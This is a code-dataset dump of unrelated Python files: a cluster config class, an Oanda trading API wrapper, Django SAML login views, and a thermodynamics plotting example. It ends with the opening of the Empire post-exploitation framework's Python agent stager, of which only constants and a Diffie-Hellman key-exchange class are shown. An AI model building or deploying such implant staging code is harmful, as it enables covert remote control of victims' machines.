self._worker_index = worker_index
@property
def worker_num(self):
return self._worker_num
@property
def gpu_num_per_worker(self):
return len(self._available_devices)
@property
def available_devices(self):
return self._available_devices
@property
def cluster_spec(self):
return self._cluster_spec
@property
def total_gpu_num(self):
return self.gpu_num_per_worker * self.worker_num
@property
def hosts(self):
return self._hosts
@hosts.setter
def hosts(self, hosts):
self._hosts = hosts
@property
def worker_num_per_machine(self):
return self._worker_num_per_machine
@worker_num_per_machine.setter
def worker_num_per_machine(self, worker_num_per_machine):
self._worker_num_per_machine = worker_num_per_machine
def __str__(self):
return "ClusterSpec: %s, WorkerNumber:%s, TaskIndex: %s, " \
"AvailableDevices: %s, Layout:%s, VirtualDevices: %s" % (
self._cluster_spec,
self.worker_num,
self._worker_index,
self._available_devices,
self._layout,
self._virtual_devices)
def __repr__(self):
return self.__str__()
def __enter__(self):
Env.get().cluster = self
def __exit__(self, unused_exception_type, unused_exception_value,
unused_traceback):
# Keep cluster information in Env.
pass
| 34.029167 | 139 | 0.695727 |
2e9424bc78e6dadd64461e50fe7a8784abd594ac | 11,001 | py | Python | tpqoa/tpqoa.py | cecabrera/tpqoa | b86b89acc3e34f74dc6f7e82d265d909749c6f03 | [
"MIT"
] | null | null | null | tpqoa/tpqoa.py | cecabrera/tpqoa | b86b89acc3e34f74dc6f7e82d265d909749c6f03 | [
"MIT"
] | null | null | null | tpqoa/tpqoa.py | cecabrera/tpqoa | b86b89acc3e34f74dc6f7e82d265d909749c6f03 | [
"MIT"
] | null | null | null | #
# tpqoa is a wrapper class for the
# Oanda v20 API (RESTful & streaming)
# making use of the v20 Python package
#
# (c) Dr. Yves J. Hilpisch
# The Python Quants GmbH
#
#
# Trading forex/CFDs on margin carries a high level of risk and may
# not be suitable for all investors as you could sustain losses
# in excess of deposits. Leverage can work against you. Due to the certain
# restrictions imposed by the local law and regulation, German resident
# retail client(s) could sustain a total loss of deposited funds but are
# not subject to subsequent payment obligations beyond the deposited funds.
# Be aware and fully understand all risks associated with
# the market and trading. Prior to trading any products,
# carefully consider your financial situation and
# experience level. Any opinions, news, research, analyses, prices,
# or other information is provided as general market commentary, and does not
# constitute investment advice. The Python Quants GmbH will not accept
# liability for any loss or damage, including without limitation to,
# any loss of profit, which may arise directly or indirectly from use
# of or reliance on such information.
#
# The tpqoa package is intended as a technological illustration only.
# It comes with no warranties or representations,
# to the extent permitted by applicable law.
#
import v20
import configparser
import pandas as pd
from v20.transaction import StopLossDetails, ClientExtensions
from v20.transaction import TrailingStopLossDetails, TakeProfitDetails
class tpqoa(object):
''' tpqoa is a Python wrapper class for the Oanda v20 API. '''
def __init__(self, conf_file):
''' Init function is expecting a configuration file with
the following content:
[oanda]
account_id = XYZ-ABC-...
access_token = ZYXCAB...
account_type = practice (default) or live
Parameters
==========
conf_file: string
path to and filename of the configuration file,
e.g. '/home/me/oanda.cfg'
'''
self.config = configparser.ConfigParser()
self.config.read(conf_file)
self.access_token = self.config['oanda']['access_token']
self.account_id = self.config['oanda']['account_id']
self.account_type = self.config['oanda']['account_type']
if self.account_type == 'live':
self.hostname = 'api-fxtrade.oanda.com'
self.stream_hostname = 'stream-fxtrade.oanda.com'
else:
self.hostname = 'api-fxpractice.oanda.com'
self.stream_hostname = 'stream-fxpractice.oanda.com'
self.ctx = v20.Context(
hostname=self.hostname,
port=443,
# ssl=True,
# application='sample_code',
token=self.access_token,
# datetime_format='RFC3339'
)
self.ctx_stream = v20.Context(
hostname=self.stream_hostname,
port=443,
# ssl=True,
# application='sample_code',
token=self.access_token,
# datetime_format='RFC3339'
)
self.suffix = '.000000000Z'
self.stop_stream = False
def get_instruments(self):
''' Retrieves and returns all instruments for the given account. '''
resp = self.ctx.account.instruments(self.account_id)
instruments = resp.get('instruments')
instruments = [ins.dict() for ins in instruments]
instruments = [(ins['displayName'], ins['name'])
for ins in instruments]
return instruments
def transform_datetime(self, dati):
''' Transforms Python datetime object to string. '''
if isinstance(dati, str):
dati = pd.Timestamp(dati).to_pydatetime()
return dati.isoformat('T') + self.suffix
def retrieve_data(self, instrument, start, end, granularity, price, smooth = False, dailyAlignment = 17, alignmentTimezone = "America/New_York"):
raw = self.ctx.instrument.candles(
instrument=instrument,
fromTime=start, toTime=end,
granularity=granularity, price=price, smooth=smooth, dailyAlignment=dailyAlignment, alignmentTimezone=alignmentTimezone)
raw = raw.get('candles')
raw = [cs.dict() for cs in raw]
if price == 'A':
for cs in raw:
cs.update(cs['ask'])
del cs['ask']
elif price == 'B':
for cs in raw:
cs.update(cs['bid'])
del cs['bid']
elif price == 'M':
for cs in raw:
cs.update(cs['mid'])
del cs['mid']
else:
raise ValueError("price must be either 'B', 'A' or 'M'.")
if len(raw) == 0:
return pd.DataFrame() # return empty DataFrame if no data
data = pd.DataFrame(raw)
data['time'] = pd.to_datetime(data['time'])
data = data.set_index('time')
data.index = pd.DatetimeIndex(data.index)
for col in list('ohlc'):
data[col] = data[col].astype(float)
return data
def get_history(self, instrument, start, end,
granularity, price, smooth = False, dailyAlignment = 17, alignmentTimezone = "America/New_York"):
''' Retrieves historical data for instrument.
Source: https://developer.oanda.com/rest-live/rates/#retrieve-instrument-history
Parameters
==========
instrument: string
valid instrument name
start, end: datetime, str
Python datetime or string objects for start and end
granularity: string
a string like 'S5', 'M1' or 'D'
price: string
one of 'A' (ask), 'B' (bid) or 'M' (middle)
Returns
=======
data: pd.DataFrame
pandas DataFrame object with data
'''
if granularity.startswith('S') or granularity.startswith('M'):
if granularity.startswith('S'):
freq = '4h'
else:
freq = 'D'
data = pd.DataFrame()
dr = pd.date_range(start, end, freq=freq)
for t in range(len(dr) - 1):
start = self.transform_datetime(dr[t])
end = self.transform_datetime(dr[t + 1])
batch = self.retrieve_data(instrument, start, end,
granularity, price)
data = data.append(batch)
else:
start = self.transform_datetime(start)
end = self.transform_datetime(end)
data = self.retrieve_data(instrument, start, end,
granularity, price, smooth, dailyAlignment, alignmentTimezone)
return data
def create_order(self, instrument, units, sl_distance=None,
tsl_distance=None, tp_price=None, comment=None,
ret=False):
''' Places order with Oanda.
Parameters
==========
instrument: string
valid instrument name
units: int
number of units of instrument to be bought
(positive int, eg 'units=50')
or to be sold (negative int, eg 'units=-100')
sl_distance: float
stop loss distance price, mandatory eg in Germany
tsl_distance: float
trailing stop loss distance
tp_price: float
take profit price to be used for the trade
comment: str
string
'''
client_ext = ClientExtensions(
comment=comment) if comment is not None else None
sl_details = (StopLossDetails(distance=sl_distance,
clientExtensions=client_ext)
if sl_distance is not None else None)
tsl_details = (TrailingStopLossDetails(distance=tsl_distance,
clientExtensions=client_ext)
if tsl_distance is not None else None)
tp_details = (TakeProfitDetails(
price=tp_price, clientExtensions=client_ext)
if tp_price is not None else None)
request = self.ctx.order.market(
self.account_id,
instrument=instrument,
units=units,
stopLossOnFill=sl_details,
trailingStopLossOnFill=tsl_details,
takeProfitOnFill=tp_details,
)
order = request.get('orderFillTransaction')
print('\n\n', order.dict(), '\n')
if ret == True:
return request
def stream_data(self, instrument, stop=None, ret=False):
''' Starts a real-time data stream.
Parameters
==========
instrument: string
valid instrument name
'''
self.stream_instrument = instrument
self.ticks = 0
response = self.ctx_stream.pricing.stream(
self.account_id, snapshot=True,
instruments=instrument)
msgs = []
for msg_type, msg in response.parts():
msgs.append(msg)
# print(msg_type, msg)
if msg_type == 'pricing.ClientPrice':
self.ticks += 1
self.on_success(msg.time,
float(msg.bids[0].dict()['price']),
float(msg.asks[0].dict()['price']))
if stop is not None:
if self.ticks >= stop:
if ret:
return msgs
break
if self.stop_stream:
if ret:
return msgs
break
def on_success(self, time, bid, ask):
''' Method called when new data is retrieved. '''
print(time, bid, ask)
def get_account_summary(self, detailed=False):
''' Returns summary data for Oanda account.'''
if detailed is True:
response = self.ctx.account.get(self.account_id)
else:
response = self.ctx.account.summary(self.account_id)
raw = response.get('account')
return raw.dict()
def get_transactions(self, tid=0):
''' Retrieves and returns transactions data. '''
response = self.ctx.transaction.since(self.account_id, id=tid)
transactions = response.get('transactions')
transactions = [t.dict() for t in transactions]
return transactions
def print_transactions(self, tid=0):
''' Prints basic transactions data. '''
transactions = self.get_transactions(tid)
for trans in transactions:
try:
templ = '%5s | %s | %9s | %12s | %8s'
print(templ % (trans['id'],
trans['time'],
trans['instrument'],
trans['units'],
trans['pl']))
except:
pass
| 38.33101 | 149 | 0.572493 |
59a3a8ca569c4237a5c745f666c29273c48e3bd9 | 9,030 | py | Python | django_saml2_auth/views.py | steverecio/django-saml2-auth | de424f0f5724ad31892ffefb54734f87840e147d | [
"Apache-2.0"
] | null | null | null | django_saml2_auth/views.py | steverecio/django-saml2-auth | de424f0f5724ad31892ffefb54734f87840e147d | [
"Apache-2.0"
] | null | null | null | django_saml2_auth/views.py | steverecio/django-saml2-auth | de424f0f5724ad31892ffefb54734f87840e147d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from saml2 import (
BINDING_HTTP_POST,
BINDING_HTTP_REDIRECT,
entity,
)
from saml2.client import Saml2Client
from saml2.config import Config as Saml2Config
from django import get_version
from pkg_resources import parse_version
from django.conf import settings
from django.contrib.auth.models import Group
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout, get_user_model
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.template import TemplateDoesNotExist
from django.http import HttpResponseRedirect
from django.utils.http import is_safe_url
from dj_rest_auth.utils import jwt_encode
from allauth.account.adapter import get_adapter
# default User or custom User. Now both will work.
User = get_user_model()
try:
import urllib2 as _urllib
except:
import urllib.request as _urllib
import urllib.error
import urllib.parse
if parse_version(get_version()) >= parse_version('1.7'):
from django.utils.module_loading import import_string
else:
from django.utils.module_loading import import_by_path as import_string
def _default_next_url():
if 'DEFAULT_NEXT_URL' in settings.SAML2_AUTH:
return settings.SAML2_AUTH['DEFAULT_NEXT_URL']
# Lazily evaluate this in case we don't have admin loaded.
return get_reverse('admin:index')
def get_current_domain(r):
if 'ASSERTION_URL' in settings.SAML2_AUTH:
return settings.SAML2_AUTH['ASSERTION_URL']
return '{scheme}://{host}'.format(
scheme='https' if r.is_secure() else 'http',
host=r.get_host(),
)
def get_reverse(objs):
'''In order to support different django version, I have to do this '''
if parse_version(get_version()) >= parse_version('2.0'):
from django.urls import reverse
else:
from django.core.urlresolvers import reverse
if objs.__class__.__name__ not in ['list', 'tuple']:
objs = [objs]
for obj in objs:
try:
return reverse(obj)
except:
pass
raise Exception('We got a URL reverse issue: %s. This is a known issue but please still submit a ticket at https://github.com/fangli/django-saml2-auth/issues/new' % str(objs))
def _get_metadata():
if 'METADATA_LOCAL_FILE_PATH' in settings.SAML2_AUTH:
return {
'local': [settings.SAML2_AUTH['METADATA_LOCAL_FILE_PATH']]
}
else:
return {
'remote': [
{
"url": settings.SAML2_AUTH['METADATA_AUTO_CONF_URL'],
},
]
}
def _get_saml_client(domain):
acs_url = domain + get_reverse([acs, 'acs', 'django_saml2_auth:acs'])
metadata = _get_metadata()
saml_settings = {
'metadata': metadata,
'service': {
'sp': {
'endpoints': {
'assertion_consumer_service': [
(acs_url, BINDING_HTTP_REDIRECT),
(acs_url, BINDING_HTTP_POST)
],
},
'allow_unsolicited': True,
'authn_requests_signed': False,
'logout_requests_signed': True,
'want_assertions_signed': True,
'want_response_signed': False,
},
},
}
if 'ENTITY_ID' in settings.SAML2_AUTH:
saml_settings['entityid'] = settings.SAML2_AUTH['ENTITY_ID']
if 'NAME_ID_FORMAT' in settings.SAML2_AUTH:
saml_settings['service']['sp']['name_id_format'] = settings.SAML2_AUTH['NAME_ID_FORMAT']
spConfig = Saml2Config()
spConfig.load(saml_settings)
spConfig.allow_unknown_attributes = True
saml_client = Saml2Client(config=spConfig)
return saml_client
@login_required
def welcome(r):
try:
return render(r, 'django_saml2_auth/welcome.html', {'user': r.user})
except TemplateDoesNotExist:
return HttpResponseRedirect(_default_next_url())
def denied(r):
return render(r, 'django_saml2_auth/denied.html')
def _create_new_user(username, email, firstname, lastname):
user = User.objects.create_user(username, email)
user.first_name = firstname
user.last_name = lastname
groups = [Group.objects.get(name=x) for x in settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('USER_GROUPS', [])]
if parse_version(get_version()) >= parse_version('2.0'):
user.groups.set(groups)
else:
user.groups = groups
user.is_active = settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('ACTIVE_STATUS', True)
user.is_staff = settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('STAFF_STATUS', True)
user.is_superuser = settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('SUPERUSER_STATUS', False)
user.save()
return user
@csrf_exempt
def acs(r):
saml_client = _get_saml_client(get_current_domain(r))
resp = r.POST.get('SAMLResponse', None)
next_url = r.session.get('login_next_url', _default_next_url())
if not resp:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
authn_response = saml_client.parse_authn_request_response(
resp, entity.BINDING_HTTP_POST)
if authn_response is None:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
user_identity = authn_response.get_identity()
if user_identity is None:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
user_email = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('email', 'Email')][0]
user_name = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('username', 'UserName')][0]
user_first_name = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('first_name', 'FirstName')][0]
user_last_name = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('last_name', 'LastName')][0]
target_user = None
is_new_user = False
try:
target_user = User.objects.get(email=user_email)
if settings.SAML2_AUTH.get('TRIGGER', {}).get('BEFORE_LOGIN', None):
import_string(settings.SAML2_AUTH['TRIGGER']['BEFORE_LOGIN'])(user_identity)
except User.DoesNotExist:
new_user_should_be_created = settings.SAML2_AUTH.get('CREATE_USER', True)
if new_user_should_be_created:
target_user = _create_new_user(user_name, user_email, user_first_name, user_last_name)
if settings.SAML2_AUTH.get('TRIGGER', {}).get('CREATE_USER', None):
import_string(settings.SAML2_AUTH['TRIGGER']['CREATE_USER'])(user_identity)
is_new_user = True
else:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
r.session.flush()
if target_user.is_active:
target_user.backend = 'django.contrib.auth.backends.ModelBackend'
get_adapter(r).login(r, target_user)
else:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
if settings.SAML2_AUTH.get('USE_JWT') is True:
# We use JWT auth send token to frontend
jwt_token = jwt_encode(target_user)
query = '?uid={}&token={}'.format(target_user.id, jwt_token)
frontend_url = settings.SAML2_AUTH.get(
'FRONTEND_URL', next_url)
return HttpResponseRedirect(frontend_url+query)
if is_new_user:
try:
return render(r, 'django_saml2_auth/welcome.html', {'user': r.user})
except TemplateDoesNotExist:
return HttpResponseRedirect(next_url)
else:
return HttpResponseRedirect(next_url)
def signin(r):
try:
import urlparse as _urlparse
from urllib import unquote
except:
import urllib.parse as _urlparse
from urllib.parse import unquote
next_url = r.GET.get('next', _default_next_url())
try:
if 'next=' in unquote(next_url):
next_url = _urlparse.parse_qs(_urlparse.urlparse(unquote(next_url)).query)['next'][0]
except:
next_url = r.GET.get('next', _default_next_url())
# Only permit signin requests where the next_url is a safe URL
if parse_version(get_version()) >= parse_version('2.0'):
url_ok = is_safe_url(next_url, None)
else:
url_ok = is_safe_url(next_url)
if not url_ok:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
r.session['login_next_url'] = next_url
saml_client = _get_saml_client(get_current_domain(r))
_, info = saml_client.prepare_for_authenticate()
redirect_url = None
for key, value in info['headers']:
if key == 'Location':
redirect_url = value
break
return HttpResponseRedirect(redirect_url)
def signout(r):
logout(r)
return render(r, 'django_saml2_auth/signout.html')
| 33.947368 | 179 | 0.673533 |
6b48de40691e37ffc5019d51b1512c68973f2900 | 786 | py | Python | addon/pyExamples/saft_vrq_mie.py | jabirali/thermopack | edad37dacaae5a820faa41593267ce6d891a4e52 | [
"MIT"
] | 28 | 2020-10-14T07:51:21.000Z | 2022-03-21T04:59:23.000Z | addon/pyExamples/saft_vrq_mie.py | jabirali/thermopack | edad37dacaae5a820faa41593267ce6d891a4e52 | [
"MIT"
] | 20 | 2020-10-26T11:43:43.000Z | 2022-03-30T22:06:30.000Z | addon/pyExamples/saft_vrq_mie.py | jabirali/thermopack | edad37dacaae5a820faa41593267ce6d891a4e52 | [
"MIT"
] | 13 | 2020-10-27T13:04:19.000Z | 2022-03-21T04:59:24.000Z | #!/usr/bin/python
# Support for python2
from __future__ import print_function
#Modify system path
import sys
sys.path.append('../pycThermopack/')
# Importing pyThermopack
from pyctp import saftvrqmie
# Importing Numpy (math, arrays, etc...)
import numpy as np
# Importing Matplotlib (plotting)
import matplotlib.pyplot as plt
# Instanciate and init SAFT-VRQ Mie object
qSAFT = saftvrqmie.saftvrqmie()
qSAFT.init("He,H2,Ne")
qSAFT.set_tmin(temp=2.0)
# Plot phase envelope
z = np.array([0.01, 0.89, 0.1])
T, P, v = qSAFT.get_envelope_twophase(1.0e4, z, maximum_pressure=1.5e7, calc_v=True)
Tc, vc, Pc = qSAFT.critical(z)
plt.plot(T, P*1.0e-6)
plt.plot([Tc], [Pc*1.0e-6], "ko")
plt.ylabel(r"$P$ (MPa)")
plt.xlabel(r"$T$ (K)")
plt.title("SAFT-VRQ Mie phase diagram")
plt.show()
plt.clf()
| 26.2 | 84 | 0.71883 |
0a06c5a0c7b812160d7a0ea884c2f42e4f1210d2 | 72,652 | py | Python | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 3 | 2018-01-05T03:59:44.000Z | 2020-02-11T03:25:46.000Z | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | null | null | null | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 1 | 2018-07-31T15:57:02.000Z | 2018-07-31T15:57:02.000Z | #!/usr/bin/env python
# AES code from https://github.com/ricmoo/pyaes
# DH code from Directly from: https://github.com/lowazo/pyDHE
# See README.md for complete citations and sources
import copy
import sys
import struct
import os
import pwd
import hashlib
import random
import string
import hmac
import urllib2
import socket
import subprocess
from binascii import hexlify
LANGUAGE = {
'NONE' : 0,
'POWERSHELL' : 1,
'PYTHON' : 2
}
LANGUAGE_IDS = {}
for name, ID in LANGUAGE.items(): LANGUAGE_IDS[ID] = name
META = {
'NONE' : 0,
'STAGING_REQUEST' : 1,
'STAGING_RESPONSE' : 2,
'TASKING_REQUEST' : 3,
'RESULT_POST' : 4,
'SERVER_RESPONSE' : 5
}
META_IDS = {}
for name, ID in META.items(): META_IDS[ID] = name
STAGING = {
'NONE' : 0,
'STAGE0' : 1,
'STAGE1' : 2,
'STAGE2' : 3
}
STAGING_IDS = {}
for name, ID in STAGING.items(): STAGING_IDS[ID] = name
ADDITIONAL = {}
ADDITIONAL_IDS = {}
for name, ID in ADDITIONAL.items(): ADDITIONAL_IDS[ID] = name
# If a secure random number generator is unavailable, exit with an error.
try:
try:
import ssl
random_function = ssl.RAND_bytes
random_provider = "Python SSL"
except (AttributeError, ImportError):
import OpenSSL
random_function = OpenSSL.rand.bytes
random_provider = "OpenSSL"
except:
random_function = os.urandom
random_provider = "os.urandom"
class DiffieHellman(object):
"""
A reference implementation of the Diffie-Hellman protocol.
By default, this class uses the 6144-bit MODP Group (Group 17) from RFC 3526.
This prime is sufficient to generate an AES 256 key when used with
a 540+ bit exponent.
"""
def __init__(self, generator=2, group=17, keyLength=540):
"""
Generate the public and private keys.
"""
min_keyLength = 180
default_generator = 2
valid_generators = [2, 3, 5, 7]
# Sanity check fors generator and keyLength
if(generator not in valid_generators):
print("Error: Invalid generator. Using default.")
self.generator = default_generator
else:
self.generator = generator
if(keyLength < min_keyLength):
print("Error: keyLength is too small. Setting to minimum.")
self.keyLength = min_keyLength
else:
self.keyLength = keyLength
self.prime = self.getPrime(group)
self.privateKey = self.genPrivateKey(keyLength)
self.publicKey = self.genPublicKey()
def getPrime(self, group=17):
"""
Given a group number, return a prime.
"""
default_group = 17
primes = {
5: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF,
14: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF,
15: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF,
16: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF,
17:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF,
18:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF
}
if group in primes.keys():
return primes[group]
else:
print("Error: No prime with group %i. Using default." % group)
return primes[default_group]
def genRandom(self, bits):
"""
Generate a random number with the specified number of bits
"""
_rand = 0
_bytes = bits // 8 + 8
while(len(bin(_rand))-2 < bits):
try:
_rand = int.from_bytes(random_function(_bytes), byteorder='big')
except:
_rand = int(random_function(_bytes).encode('hex'), 16)
return _rand
def genPrivateKey(self, bits):
"""
Generate a private key using a secure random number generator.
"""
return self.genRandom(bits)
def genPublicKey(self):
"""
Generate a public key X with g**x % p.
"""
return pow(self.generator, self.privateKey, self.prime)
def checkPublicKey(self, otherKey):
"""
Check the other party's public key to make sure it's valid.
